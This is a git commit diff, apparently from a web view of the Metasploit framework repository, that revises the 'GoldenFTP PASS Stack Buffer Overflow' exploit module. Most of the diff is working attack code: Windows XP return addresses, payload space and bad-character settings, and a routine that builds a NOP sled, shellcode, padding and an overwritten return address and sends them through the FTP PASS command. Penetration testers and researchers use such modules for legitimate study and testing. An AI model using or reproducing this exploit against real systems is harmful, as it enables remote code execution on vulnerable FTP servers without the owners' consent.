Updated metadata, merged code with #4923. Thx Joff.
git-svn-id: file:///home/svn/framework3/trunk@13211 4d416f70-5f16-0410-b530-b9f4589650daunstable
Wei Chen
parent
9b72b12050
commit
821e9dd68b
|
|
@ -20,10 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'GoldenFTP PASS Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Golden
|
||||
FTP service. This module uses the PASS command to trigger the overflow.
|
||||
This module exploits a vulnerability in the Golden FTP service, using the PASS
|
||||
command to cause a stack-based buffer overflow. Please note that in order trigger
|
||||
the vulnerable code, the victim machine must have the "Show new connections" setting
|
||||
enabled. By default, this option is unchecked.
|
||||
},
|
||||
'Author' => [ 'bannedit' ],
|
||||
'Author' =>
|
||||
[
|
||||
'Craig Freyman', #Initial poc on exploit-db with iglesiasgg
|
||||
'bannedit', #Initial msf module
|
||||
'Joff Thyer <jsthyer[at]gmail.com>', #Improved msf version
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
@ -40,24 +47,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 350,
|
||||
'Space' => 440,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x00a93ca6,
|
||||
},
|
||||
]
|
||||
|
||||
[ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], #JMP ESI USER32.dll
|
||||
[ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], #JMP ESI USER32.dll
|
||||
[ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] #JMP ESI kernel32.dll
|
||||
],
|
||||
'DisclosureDate' => 'Jan 23 2011'))
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
connect
|
||||
disconnect
|
||||
|
|
@ -70,23 +72,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
if datastore['RHOST'].length < 15
|
||||
pad = make_nops(1) * (15 - datastore['RHOST'].length)
|
||||
end
|
||||
|
||||
sploit = make_nops(4) * 38
|
||||
shortjmp = make_nops(3) + "\xeb\x20"
|
||||
nopsled = make_nops(1) * 60
|
||||
srciplen = Rex::Socket.source_address.length
|
||||
padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))
|
||||
|
||||
sploit = nopsled
|
||||
sploit << payload.encoded
|
||||
sploit << pad unless pad.nil?
|
||||
sploit << make_nops(1) * (528 - sploit.length)
|
||||
sploit << padding
|
||||
sploit << [target.ret].pack('V')
|
||||
|
||||
print_status("Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
begin
|
||||
connect
|
||||
send_user("anonymous")
|
||||
send_cmd(['PASS', sploit], false)
|
||||
handler
|
||||
rescue EOFError
|
||||
end
|
||||
|
||||
connect
|
||||
send_user(datastore['FTPUSER'])
|
||||
send_cmd(['PASS', sploit], false)
|
||||
select(nil,nil,nil,2)
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue